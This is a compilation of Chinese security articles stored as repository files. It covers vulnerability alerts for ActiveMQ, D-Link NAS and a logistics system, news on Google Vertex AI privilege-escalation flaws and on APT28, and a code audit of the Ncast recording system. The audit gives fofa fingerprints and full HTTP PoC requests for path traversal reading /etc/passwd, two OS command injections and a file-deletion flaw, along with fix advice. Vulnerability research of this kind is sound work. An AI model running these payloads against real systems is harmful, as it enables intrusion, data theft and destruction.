**影响范围:**activemq[6.0.0, 6.1.2)org.apache.activemq:apache-activemq[6.0.0, 6.1.2)**修复方案:**将组件activemq升级至6.1.2及以上版本将组件org.apache.activemq:apache-activemq升级至6.1.2 及以上版本**参考链接:**https://issues.apache.org/jira/browse/AMQ-9477https://lists.apache.org/thread/y0gwbjkps680b43y7z7nfy4q453d0kr9

View File

@ -0,0 +1,48 @@
# 【漏洞预警】D-Link-DNS 多款产品未公开接口/sc_mgr.cgi 存在远程命令执行漏洞
thelostworld 2024-11-15 20:24
免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!马赛克安全实验室情报申明(可点击查看)
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRicPjtibQUDC6OnlQyWCzfd68f5ycicia6CCgOhrqkvHfLj5ajt2SKLnWoZSh219zUS3eTcERBwhxu9Dg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
0x01产品介绍
**D-Link NASNetwork Attached Storage网络附加存储是一种连接到计算机网络的存储设备它允许在网络上的多个设备之间共享和存储数据。D-Link 是一家知名的网络设备制造商,提供各种类型的 NAS 解决方案,适用于家庭和企业用户。**
0x02产品指纹
****
```
body="/cgi-bin/login_mgr.cgi" && body="cmd=cgi_get_ssl_info"
```
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McR8kpbPfI7MzqMym38qXjrxZE7qE8uEHJlLlpYGoc8R0FX8JIFvAVedaJPVTEDKa6gWzatibFXYeULA/640?wx_fmt=png&from=appmsg "")
0x03漏洞复现
**/cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info 接口处存在远程命令执行漏洞**
****
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McR8kpbPfI7MzqMym38qXjrxZMs4A59P87AsnomAOL1HCG3icQqubxwsTHyxU8ibpto8kDsYic5AHMhedg/640?wx_fmt=png&from=appmsg "")
********0x04扫码加入星球查看详情
**扫描加入星球不迷路**
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRibMUiczLZevyribRn1qUpneDyfgJROGIibTVTjgVeErEr7icQzaVX1hBUfB2c4e2lUHP7EhUia0pvKe7Lg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRicPjtibQUDC6OnlQyWCzfd68iabQ9Vb5JGMNXqnzJTc28tomdyWugPkbLp6Kgc9tECG2XXPMTiafwTAw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
0x05星球介绍
**马赛克安全**
**专注于漏洞情报分享,不发烂大街的东西。星球外面的兄弟欢迎进来白嫖,不满意三天退款。放心大胆的进来嫖!!!**
**很多漏洞均为全网首发的0day/1day目前星球已累计发送431个漏洞POC脚本有没有价值只有体会才知道**
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRibaibL5lI7fXfSskibI19X9GOV7ibcyFnQGyH54BwBEhlKiaE8j536CiacuVvZGMCfhtMF5VXDW2Jp6PDw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
****

View File

@ -0,0 +1,60 @@
# 【漏洞预警】易思智能物流无人值守系统SQL注入
thelostworld 2024-11-15 20:24
免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!马赛克安全实验室情报申明(可点击查看)
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRicPjtibQUDC6OnlQyWCzfd68f5ycicia6CCgOhrqkvHfLj5ajt2SKLnWoZSh219zUS3eTcERBwhxu9Dg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
0x01产品介绍
**易思无人值守智能物流系统是一款集成了人工智能、机器人技术和物联网技术的创新产品。它能够自主完成货物存储、检索、分拣、装载以及配送等物流作业,帮助企业实现无人值守的智能物流运营,提高效率、降低成本,为现代物流行业带来新的发展机遇。**
0x02产品指纹
****
```
body="/api/SingleLogin/login"
```
****
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRibDdnkUDHXFU3cQkvFMP4hYdmibaHxdvwsS883XT7mJ9azTQCXqqQx3vnz7lgYyHkW0EhGKpuSUt5Q/640?wx_fmt=png&from=appmsg "")
****
****0x03漏洞复现
**易思无人值守智能物流系统 /Sys_ReportFile/ExportReport 接口存在SQL注入漏洞**
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRibDdnkUDHXFU3cQkvFMP4hYeFYfZzwVEDWiaLgEr0R8G22FMibcmTK1KxfwOf108SUQ9eBb4kvDzdzw/640?wx_fmt=png&from=appmsg "")
0x04扫码加入星球查看详情
**扫描加入星球不迷路**
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRibMUiczLZevyribRn1qUpneDyfgJROGIibTVTjgVeErEr7icQzaVX1hBUfB2c4e2lUHP7EhUia0pvKe7Lg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRicPjtibQUDC6OnlQyWCzfd68iabQ9Vb5JGMNXqnzJTc28tomdyWugPkbLp6Kgc9tECG2XXPMTiafwTAw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
0x05星球介绍
**马赛克安全**
**专注于漏洞情报分享,不发烂大街的东西。星球外面的兄弟欢迎进来白嫖,不满意三天退款。放心大胆的进来嫖!!!**
**很多漏洞均为全网首发的0day/1day目前星球已累计发送431个漏洞POC脚本有没有价值只有体会才知道**
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRibaibL5lI7fXfSskibI19X9GOV7ibcyFnQGyH54BwBEhlKiaE8j536CiacuVvZGMCfhtMF5VXDW2Jp6PDw/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
****
****
#
****
****
****

View File

@ -0,0 +1,136 @@
# 两个Google Vertex AI平台漏洞曝光可能导致权限提升与敏感数据外泄
锋刃科技 2024-11-15 23:56
![](https://mmbiz.qpic.cn/mmbiz_png/n5BstuRWwQpOrooaPFdgllBUY10cvJ8Cd7fN0sxGEKQeGUegyaunicTwrPKiaDaQ2wNuicIIoyZxbPq9wX0MrIYvg/640?from=appmsg&wx_fmt=png "")
![](https://mmbiz.qpic.cn/mmbiz_png/5EHHUdqrO47DbMXaFV69QMBm1OMXMf0x1Y8siaRdpIYlmLibD3rO8KoTlEIRMJb4DyQADFwdPTnNBSqtcfusbwwA/640?from=appmsg&wx_fmt=png "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/YhYicpKnr4247fYLPRKFM5O2ehNiaXplcqkc1b8UbFoH1Nj7Re4qruRGibicMHPiaas34s49luJsauRQyLzqp01AMBg/640?from=appmsg&wx_fmt=png "")
近日网络安全研究人员曝光了Google Vertex AI平台中的两个严重漏洞如果被成功利用攻击者可能通过这些漏洞提升权限并将存储在云端的机器学习模型ML模型和人工智能应用程序的数据外泄。
通过这两个漏洞攻击者能够绕过正常的安全机制获取对Google云端资源的未授权访问从而窃取敏感数据和专有的机器学习模型。
![](https://mmbiz.qpic.cn/mmbiz_png/KYJQTmhnOUQFIcaMibm31a2fDEicgAExkR9XfvtoHu923qZ97t8GEgrsb0UG2ID2BicCGEfC5TbrfUsu5F0icO6tBQ/640?from=appmsg&wx_fmt=png "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ub2EkGPegAd7PBd9icmO74MibKV7HrsHlLk3X0TZiaZzBQbuAGF81mYV3wepynDVbkevOtCdLzxpOP6icZ7f5rkwWg/640?from=appmsg&wx_fmt=png "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/NLG0YnDqzvAmueyibjYktxGAPM4ibY3QLibgMOMRc1fM6DrsNh7ROIhfT4P8OFxic49oMva8YfjMGyibzZroGgdOfMw/640?from=appmsg&wx_fmt=png "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/fWmp3zFswgHaymMEibnGLh6mqk9autBVEmDeUiaE4hiaAaOtZzgwibwq6fvGFuLvAThaZdtibCWqibVcznz0tbx7lYOQ/640?wx_fmt=png&from=appmsg "")
****
![](https://mmbiz.qpic.cn/mmbiz_gif/iboFNCcvWkSMg7Om2vzSseNXyc8iciaazL1VbMXhWibzKQIGIZibr6V3L9ON92kCDWlonOQzDaQvwqiaicfNlYOJXS7Tw/640?from=appmsg&wx_fmt=gif "")
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/R2P71IIgt1BZtQBDTCPctNWjJX88AA5QMwSloc9ZfjI6HyKS3hzZNzibVQsI2x7sDqB72vTxTZmr8GjxgFR2JFA/640?from=appmsg&wx_fmt=gif "")
Vertex AI平台概述
![](https://mmbiz.qpic.cn/mmbiz_png/WgWJib87LbAb2JudTQz9xeloxDUg0We6oXoNn5wO5xtZ53U0AwFWFibTZHBnNXDz1BmVLkkeeWkoc2nTMsXPKa8A/640?from=appmsg&wx_fmt=png "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/3pTKcXWlxyMrTAFPre3CGO1EQuiaFVF4F2ia8VognUCvcFTtnRaHeDPRxn91HM2CIQnyib4Jpb9d9oC0ZRJJ7V6Ug/640?wx_fmt=png "")
Vertex AI是Google推出的一个全托管机器学习平台旨在帮助开发者构建、训练、调优和部署机器学习模型。自2021年5月发布以来它已经成为许多企业和开发者在AI应用领域的重要工具。Vertex AI利用多个功能模块如Vertex AI Pipelines使得用户能够自动化管理和监控机器学习的生命周期从数据准备、模型训练到部署。
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/fWmp3zFswgHaymMEibnGLh6mqk9autBVEbOGAN02XqJATfdWKdvuuQMBbe4BKDCRy6OIaBkjYtkPPn1icYteYic0Q/640?wx_fmt=jpeg "")
![](https://mmbiz.qpic.cn/mmbiz_gif/iboFNCcvWkSMg7Om2vzSseNXyc8iciaazL1VbMXhWibzKQIGIZibr6V3L9ON92kCDWlonOQzDaQvwqiaicfNlYOJXS7Tw/640?from=appmsg&wx_fmt=gif "")
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/R2P71IIgt1BZtQBDTCPctNWjJX88AA5QMwSloc9ZfjI6HyKS3hzZNzibVQsI2x7sDqB72vTxTZmr8GjxgFR2JFA/640?from=appmsg&wx_fmt=gif "")
**漏洞详情:权限提升与模型外泄**
![](https://mmbiz.qpic.cn/mmbiz_png/WgWJib87LbAb2JudTQz9xeloxDUg0We6oXoNn5wO5xtZ53U0AwFWFibTZHBnNXDz1BmVLkkeeWkoc2nTMsXPKa8A/640?from=appmsg&wx_fmt=png "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/3pTKcXWlxyMrTAFPre3CGO1EQuiaFVF4F2ia8VognUCvcFTtnRaHeDPRxn91HM2CIQnyib4Jpb9d9oC0ZRJJ7V6Ug/640?wx_fmt=png "")
这两项安全漏洞的存在暴露了Vertex AI平台中存在的严重风险。如果这些漏洞被恶意攻击者利用可能会导致数据泄露、资源滥用以及敏感模型的外泄。
**1. 通过自定义作业进行权限提升**
研究人员指出Vertex AI Pipelines中的一个关键功能“自定义作业”是攻击者利用漏洞进行权限提升的突破口。自定义作业允许用户自动化模型训练流程但这也给攻击者提供了滥用权限的机会。
通过精心构造一个“恶意自定义作业”攻击者可以在平台内注入一个“反向连接”的恶意镜像从而获得回门访问权限。这使得攻击者能够绕过安全控制获取对大量Google云服务资源的完全访问权限包括列出服务帐户、管理存储桶、访问BigQuery表格等这些资源可以被滥用来访问Google Cloud中的内部存储库并下载敏感数据。
**2. 恶意模型部署引发的敏感数据外泄**
第二个漏洞则涉及到将“中毒的模型”部署到Vertex AI平台的租户项目中。当该恶意模型被部署到端点时它会触发一个反向连接利用“custom-online-prediction”服务帐户的只读权限枚举Kubernetes集群并获取集群凭证进而执行任意的kubectl命令。
研究发现这一过程能够帮助攻击者跨越Google Cloud PlatformGCP与Kubernetes的边界利用IAM工作负载身份联合IAM Workload Identity Federation获取GKEGoogle Kubernetes Engine集群中的敏感数据。通过进一步的横向移动攻击者能够获取集群内新创建的镜像并提取其唯一标识符——镜像摘要从而能够提取出这些镜像的内容。
![](https://mmbiz.qpic.cn/mmbiz_gif/iboFNCcvWkSMg7Om2vzSseNXyc8iciaazL1VbMXhWibzKQIGIZibr6V3L9ON92kCDWlonOQzDaQvwqiaicfNlYOJXS7Tw/640?from=appmsg&wx_fmt=gif "")
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/R2P71IIgt1BZtQBDTCPctNWjJX88AA5QMwSloc9ZfjI6HyKS3hzZNzibVQsI2x7sDqB72vTxTZmr8GjxgFR2JFA/640?from=appmsg&wx_fmt=gif "")
**模型外泄的严重后果**
![](https://mmbiz.qpic.cn/mmbiz_png/WgWJib87LbAb2JudTQz9xeloxDUg0We6oXoNn5wO5xtZ53U0AwFWFibTZHBnNXDz1BmVLkkeeWkoc2nTMsXPKa8A/640?from=appmsg&wx_fmt=png "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/3pTKcXWlxyMrTAFPre3CGO1EQuiaFVF4F2ia8VognUCvcFTtnRaHeDPRxn91HM2CIQnyib4Jpb9d9oC0ZRJJ7V6Ug/640?wx_fmt=png "")
更为严重的是这些恶意模型不仅能够窃取机器学习模型还能通过类似的方式窃取大语言模型LLM及其微调模型。开发者在不知情的情况下如果将一个经过“木马”处理的模型上传到公共存储库并进行部署攻击者就可以利用该漏洞窃取该平台上所有的ML模型及其微调数据。
![](https://mmbiz.qpic.cn/mmbiz_gif/iboFNCcvWkSMg7Om2vzSseNXyc8iciaazL1VbMXhWibzKQIGIZibr6V3L9ON92kCDWlonOQzDaQvwqiaicfNlYOJXS7Tw/640?from=appmsg&wx_fmt=gif "")
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/R2P71IIgt1BZtQBDTCPctNWjJX88AA5QMwSloc9ZfjI6HyKS3hzZNzibVQsI2x7sDqB72vTxTZmr8GjxgFR2JFA/640?from=appmsg&wx_fmt=gif "")
**漏洞的影响及修复**
![](https://mmbiz.qpic.cn/mmbiz_png/WgWJib87LbAb2JudTQz9xeloxDUg0We6oXoNn5wO5xtZ53U0AwFWFibTZHBnNXDz1BmVLkkeeWkoc2nTMsXPKa8A/640?from=appmsg&wx_fmt=png "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/3pTKcXWlxyMrTAFPre3CGO1EQuiaFVF4F2ia8VognUCvcFTtnRaHeDPRxn91HM2CIQnyib4Jpb9d9oC0ZRJJ7V6Ug/640?wx_fmt=png "")
这些漏洞的存在意味着攻击者可以通过一个未经验证的模型就能在生产环境中进行攻击最终导致敏感数据的泄露和模型的外泄。幸运的是Google已经在负责任披露之后修复了这些漏洞并加强了相关的安全防护措施。
Google发言人表示“我们已经采取了措施来解决这两个问题并加强了Vertex AI平台的安全性。”但是研究人员指出这一事件提醒我们随着人工智能技术的不断发展如何有效保护AI环境的安全变得愈发重要。
![](https://mmbiz.qpic.cn/mmbiz_gif/iboFNCcvWkSMg7Om2vzSseNXyc8iciaazL1VbMXhWibzKQIGIZibr6V3L9ON92kCDWlonOQzDaQvwqiaicfNlYOJXS7Tw/640?from=appmsg&wx_fmt=gif "")
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/R2P71IIgt1BZtQBDTCPctNWjJX88AA5QMwSloc9ZfjI6HyKS3hzZNzibVQsI2x7sDqB72vTxTZmr8GjxgFR2JFA/640?from=appmsg&wx_fmt=gif "")
**安全建议:如何保护机器学习模型**
![](https://mmbiz.qpic.cn/mmbiz_png/WgWJib87LbAb2JudTQz9xeloxDUg0We6oXoNn5wO5xtZ53U0AwFWFibTZHBnNXDz1BmVLkkeeWkoc2nTMsXPKa8A/640?from=appmsg&wx_fmt=png "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/3pTKcXWlxyMrTAFPre3CGO1EQuiaFVF4F2ia8VognUCvcFTtnRaHeDPRxn91HM2CIQnyib4Jpb9d9oC0ZRJJ7V6Ug/640?wx_fmt=png "")
为了避免类似事件的发生Palo Alto Networks的研究人员建议组织应采取以下安全措施
- 严格控制模型部署:确保只有经过验证的模型可以被部署到生产环境,尤其是在公共存储库中上传的模型,必须经过严格审查。
- 定期审计权限:组织应定期审计与模型部署相关的权限,确保自定义作业和服务帐户的权限不会被滥用。
- 增强监控与检测:部署强有力的监控机制,及时发现可疑的活动并响应,特别是在模型部署和反向连接操作中。
- 加强云环境与Kubernetes的安全隔离确保GCP和Kubernetes之间的权限和安全边界得到有效隔离避免攻击者通过横向移动扩大攻击面。
![](https://mmbiz.qpic.cn/mmbiz_gif/iboFNCcvWkSMg7Om2vzSseNXyc8iciaazL1VbMXhWibzKQIGIZibr6V3L9ON92kCDWlonOQzDaQvwqiaicfNlYOJXS7Tw/640?from=appmsg&wx_fmt=gif "")
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/R2P71IIgt1BZtQBDTCPctNWjJX88AA5QMwSloc9ZfjI6HyKS3hzZNzibVQsI2x7sDqB72vTxTZmr8GjxgFR2JFA/640?from=appmsg&wx_fmt=gif "")
**结语**
![](https://mmbiz.qpic.cn/mmbiz_png/WgWJib87LbAb2JudTQz9xeloxDUg0We6oXoNn5wO5xtZ53U0AwFWFibTZHBnNXDz1BmVLkkeeWkoc2nTMsXPKa8A/640?from=appmsg&wx_fmt=png "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/3pTKcXWlxyMrTAFPre3CGO1EQuiaFVF4F2ia8VognUCvcFTtnRaHeDPRxn91HM2CIQnyib4Jpb9d9oC0ZRJJ7V6Ug/640?wx_fmt=png "")
此次曝光的Google Vertex AI漏洞为业界敲响了警钟随着机器学习和人工智能技术的广泛应用确保这些平台的安全至关重要。即便是看似小的漏洞也可能导致敏感数据和知识产权的严重泄露。因此开发者和企业必须加大对AI平台安全性的投入严格审查和管理权限确保AI模型的部署环境是安全的。
随着AI技术日益成为企业的核心资产如何平衡创新与安全保护好这些创新成果将成为未来AI行业面临的重要课题。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/fWmp3zFswgEWAQw8ycXtibK1nNjQXv6hFZRiaXnbgPLZoWsIjfVOLCRAqxqBIfcLJ6gibBb5KaiaM9xoic4RaeOH0oA/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")

View File

@ -0,0 +1,246 @@
# 代码审计-某产品高清智能录播系统漏洞分析附未公开POC
实战安全研究 2024-05-05 22:39
![](https://mmbiz.qpic.cn/mmbiz_gif/1mtwZURvGTkCK3ZFyqYEyTwmaLo2YSMeibz3eeShkewiadS4oh0RBl1U7BTVeEscGQrEbjWKcQzGpJEFLwr4cFQw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
最近很多小伙伴反馈看不到最新的推文,由于微信公众号推送机制改变了,解决办法:
**给公众号设为星标**
![](https://mmbiz.qpic.cn/sz_mmbiz_png/K98U0WWMOQJq7Hw7iaPuXfEL91oR9qggXiaMF1sCF61fsOVIgrxmtGXPWPLibhWDcUTFOXcianhuz3o9tVIs9Zuq7Q/640?wx_fmt=png&from=appmsg "")
**本文来自团队小伙伴:c3ting**
**博客地址**
**https://c3ting.com**
fofa
```
app="Ncast-产品" && title=="高清智能录播系统"
```
#### 路由:
manage-check_Login
即对应访问manage目录下的check_Login文件
路由反射:
路径:/classes/common/busiFacade.php
```
require_once "gerenal.inc"; // 在gerenal.inc文件中存在自动加载类文件可用遍历目录下的类文件并加载该文件
$input = urldecode(file_get_contents("php://input")); //获取POST内容
$jsonObj = json_decode($input); // 解码
$function = getFunctionFromJson($jsonObj); // 动态获取服务对象
$retValue = $function->getFuncMethod()->invokeArgs($function->getServiceObject(), $function->getParameters()); // 调用上面的服务对象的对应的函数方法,并传递了对应的参数
function getFunctionFromJson($jsonObj)
{
$log = Logger::getLogger("busiFacade");
$serviceName = $jsonObj->{"serviceName"};
$funcName = $jsonObj->{"name"};
$class = null;
try
{
$class = new ReflectionClass($serviceName);
$functionModel = new FunctionModel();
$functionModel->setServiceObject($class->newInstance());
$functionModel->setFuncMethod($class->getmethod($funcName));
$functionModel->setParameters($jsonObj->{"param"});
$log->info("class:".$serviceName.",func:".$funcName);
return $functionModel;
}
catch(Exception $e)
{
throw $e;
}
}
```
主要代码如上:首先获取输入值json对象然后使用getFunctionFromJson获取到服务对象后调用相应的服务对象中的函数方法并传递对应的参数
如:
```
{"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["127.0.0.1"]}
```
即为 调用SysManager类中的ping方法 并传递param值如果使用该反射调用其他类执行漏洞后生成的文件地址默认会在该地方详细如下
#### 鉴权分析:
该系统中的鉴权文件为:/public/session.php
但是实际中很多都没有使用 到该鉴权文件,直接导致很多目录可用直接使用
![](https://mmbiz.qpic.cn/sz_mmbiz_png/K98U0WWMOQLzrIibBo82pkK9DmnClXpoHib2NDL49S3RbB7OdlVH3fIoXZqAc1cZDgm2plibVbBib7J6xfbdFyoBicg/640?wx_fmt=png&from=appmsg "")
鉴权中 主要判断session中存的时间是否存在和是否到期 但是系统的登录页带游客登录 使用游客登录即可绕过
#### 漏洞分析:
##### 1、任意文件下载
该洞在根目录的 zipConfig.php中发现有引用深入分析后可得。
漏洞文件位置developLog/downloadLog.php
```
GET /developLog/downloadLog.php?name=../../../../etc/passwd HTTP/1.1
Host: xxx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=xxxx
Connection: close
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/K98U0WWMOQLzrIibBo82pkK9DmnClXpoHkfAOcpbcibwicc5XnlyLiaJE3vT6hzKvRfdcrCkNLwInxE16WicEjZG4bg/640?wx_fmt=png&from=appmsg "")
##### 代码分析:
![](https://mmbiz.qpic.cn/sz_mmbiz_png/K98U0WWMOQLzrIibBo82pkK9DmnClXpoH1uKziacvtPIR6VITQWmN3QOVachibnWT8pzJy1wmNGXnB1Xt3KSxhCRw/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/K98U0WWMOQLzrIibBo82pkK9DmnClXpoHuVT4svMdsdFiaxL0Qdcuju1FwP79qWKOg3gaa7kQ0FAA9MmbAwL3Bgw/640?wx_fmt=png&from=appmsg "")
该文件中的无授权引入,可直接利用。且只判断文件是否存在,无判断参数**$pathName**中的目录地址是否合法
修复建议:引入鉴权、判断目录是否合法
##### 2、命令执行
执行位置:/classes/common/busiFacade.php类文件地址/classes/manage/SysManager.php
```
POST /classes/common/busiFacade.php HTTP/1.1
Host: xxxx
Content-Length: 130
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=xxxx
Connection: close
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22127.0.0.1%7Cpwd%22%5D%7D
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/K98U0WWMOQLzrIibBo82pkK9DmnClXpoH5YSYDYm2ExROFA8ZDubsRXgSEUEhWDwG8mBA2iaACfV00icYwORsQ0VA/640?wx_fmt=png&from=appmsg "")
代码分析:
```
public function ping($ip)
{
try
{
$ret = shell_exec("ping -c4 $ip");
$this->log->info($ret);
return $ret;
}
catch (Exception $e)
{
$this->log->error($e->getMessage(), $e);
throw $e;
}
}
```
通过入口反射调用了SysManager类中的ping方法在ping方法中 无过滤传进来的**$ip**参数直接拼接shell指令并执行执行并将执行后的输出返回到前端
修复建议在使用shell_exec、exec、eval这类危险函数时 必须严格过滤用户的输入可使用正则等方式判断输入是否合法
##### 3、命令执行
执行位置:/classes/common/busiFacade.php类文件地址/classes/manage/SysManager.php
```
POST /classes/common/busiFacade.php HTTP/1.1
Host: xxxxxxx
Content-Length: 261
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=xxxxx
Connection: close
%7B%22name%22%3A%22setIpConfig%22%2C%22serviceName%22%3A%22SysManager%22%2C%22userTransaction%22%3Afalse%2C%22param%22%3A%5B%22%3Bpwd%3E%3E1.txt%22%2C%22255.255.252.0%22%2C%22192.168.7.1%22%2C%22202.96.128.86%22%2C%22192.168.89.89%22%2C%22255.255.252.0%22%5D%7D
```
```
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/K98U0WWMOQLzrIibBo82pkK9DmnClXpoH4QJjyEsO2GEhTAWSwWbiaXKvJLOMTgR5xLDaRf4tKFiazONXZAOtFXgQ/640?wx_fmt=png&from=appmsg "")
##### 代码分析:
```
public function setIpConfig($ip, $mask, $gateway, $dns, $ip2, $mask2)
{
$cmd = "/ncast/shell/saveIP.sh $ip $mask $gateway $dns $ip2 $mask2";
try
{
$this->log->info($cmd);
exec($cmd);
}
catch (Exception $e)
{
$this->log->error($e->getMessage(), $e);
throw $e;
}
}
```
该rce也是通过入口反射文件执行到SysManager类中的setIpConfig函数中该函数中 无过滤用户输入 直接拼接shell指令并使用exec执行欲想生成文件 在无指定地址的情况下 默认会在入口反射文件同目录下生成。
修复建议:鉴权、判断用户输入的合法性
##### 4、任意文件删除未测试
入口位置developLog/check_develop.php
```
$obj = $_REQUEST;
function deleteDevLog($obj){
$logger = Logger::getLogger("deleteDevLog");
$pathNames = $obj['pathNames'];
try{
if(count($pathNames) < 0 || $pathNames == null)
return ;
foreach($pathNames as $pathName){
if(file_exists($pathName))
unlink($pathName);
$logger->info("删除日志:".$pathName);
}
}catch (Exception $e){
$logger->error($e->getMessage(), $e);
throw $e;
}
}
$type = $obj['type'];
if("del" == $type){
deleteDevLog($obj);
}else{
qryDevelopLog($obj);
}
```
该漏洞未测试 但通过静态分析看出 确实存在该漏洞
该文件中 传入**type**值为**del**后即可触发**deleteDevLog**函数
在**deleteDevLog**函数中 遍历参数中**pathNames**的值并判断 该文件是否存在 如果存在即调用unlink方法直接删除
![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWiaWs5g9QGias3uHL9Uf0LibiaBDEU5hJAFfap4mBBAnI4BIic2GAuYgDwUzqwIb9wicGiaCyopAyJEKapgA/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
**点分享**
![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWiaWs5g9QGias3uHL9Uf0LibiaBRJ4tRlk9QKMxMAMticVia5ia8bcewCtM3W67zSrFPyjHuSKmeESESE1Ig/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
**点收藏**
![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWiaWs5g9QGias3uHL9Uf0LibiaBnTO2pb7hEqNd7bAykePEibP0Xw7mJTJ7JnFkHuQR9vHE7tNJyHIibodA/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
**点点赞**
![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWiaWs5g9QGias3uHL9Uf0LibiaBhibuWXia5pNqBfUReATI6GO6sYibzMvj8ibQM6rOo2ULshCrbaM0mJYEqw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
**点在看**

View File

@ -0,0 +1,248 @@
# 俄罗斯 APT28 利用 Microsoft Outlook 漏洞攻击捷克、德国实体
会杀毒的单反狗 军哥网络安全读报 2024-05-05 09:00
**导****读**
捷克和德国周五透露它们是与俄罗斯有联系的APT28黑客组织进行的长期网络间谍活动的目标此举引起了欧盟
(EU)、北约 (NATO) 的谴责。
捷克共和国外交部
(MFA) 在一份声明中表示,该国一些未透露姓名的实体因去年初曝光的 Microsoft Outlook 安全漏洞而遭到攻击。
所涉及的安全漏洞是CVE-2023-23397这是
Outlook 中现已修补的一个关键权限提升漏洞,可能允许攻击者访问 Net-NTLMv2 哈希值,然后使用它们通过中继攻击来验证自己的身份。
德国政府将攻击者归咎于针对社会民主党执行委员会的网络攻击,该攻击在“相对较长的时间内”使用相同的
Outlook 漏洞,使其能够“危害大量电子邮件帐户”。
该活动针对的一些垂直行业包括位于德国、乌克兰和欧洲的物流、军备、航空航天工业、IT
服务、基金会和协会,联邦监管机构还暗示该组织参与了 2015 年对德国联邦议会的攻击行动。
APT28
经评估与俄罗斯联邦军事情报机构 GRU 的军事单位 26165 有联系也被更广泛的网络安全社区命名为BlueDelta、Fancy
Bear、Forest Blizzard以前称为 Strontium、FROZENLAKE、Iron Twilight、Pawn Storm、
Sednit、Sofacy 和 TA422。
